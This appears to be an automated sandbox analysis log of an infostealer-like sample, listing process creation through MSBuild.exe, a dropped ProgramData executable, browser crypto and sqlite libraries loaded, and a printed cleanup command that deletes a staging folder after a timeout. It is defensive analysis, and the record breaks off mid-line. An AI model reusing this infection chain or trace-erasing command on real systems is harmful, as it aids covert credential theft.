Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_0041147A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 1_2_0041196C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MW3EJX4O.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7284
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Command line argument: MZx 8_2_001B2021
Source: C:\ProgramData\AAFIIJDAAA.exe Command line argument: MZx 8_2_001B2021
Source: C:\ProgramData\AAFIIJDAAA.exe Command line argument: MZx 8_2_001B2021
Source: T2bmenoX1o.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: CAAKKF.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: T2bmenoX1o.exe Virustotal: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\T2bmenoX1o.exe "C:\Users\user\Desktop\T2bmenoX1o.exe"
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\AAFIIJDAAA.exe "C:\ProgramData\AAFIIJDAAA.exe"
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJKFBAFIDAEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\AAFIIJDAAA.exe "C:\ProgramData\AAFIIJDAAA.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJKFBAFIDAEB" & exit Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T2bmenoX1o.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: T2bmenoX1o.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2249159673.0000000038339000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2244107241.000000002C45F000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T2bmenoX1o.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,G